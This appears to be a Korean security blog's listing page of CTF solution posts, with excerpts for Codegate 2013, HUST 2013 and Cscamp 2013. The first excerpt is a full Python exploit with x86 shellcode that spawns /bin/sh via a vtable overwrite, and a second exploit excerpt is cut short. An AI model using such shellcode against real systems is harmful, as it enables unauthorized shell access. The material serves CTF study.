반응형 Security/[게임] CTF 풀이56 [exploit]codegate 2013 vuln300 #!/usr/bin/python from socket import * shellcode = "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" payload = "" payload += "-4\n" payload += "\xe4\x91\x04\x08" payload += "\xe8\x91\x04\x08" payload += "\x90"*0x30 payload += shellcode print payload vtable을 덮어서 쉘코드 호출 2014. 2. 7. [exploit]codegate 2013 vuln200 #!/usr/bin/env python import socket import struct host = '127.0.0.1' port = 7777 p = lambda x: struct.pack(" 2014. 2. 7. 2013 HUST Hacking Festival 풀이 올해 hust는 8단계까지 풀어서 아쉬웠네요.. 풀이는 1stage부터 2stage 8번까지 입니다. 난해한 문제가 많았던 대회....모두 수고하셨습니다!! :) 2013. 11. 25. 2013 Cscamp CTF writeup Forensics 1.-----------------------------------------------------------------------------------------------Databases are very critical. Thats why there is an always backup of the database.Our database admin, John, had an attack and he lost all information in his database, thats why had to use the backup.Unfortunately, the back up was tampered by some script kiddie. The attacker added some fake u.. 2013. 11. 19. 이전 1 ··· 7 8 9 10 11 12 13 14 다음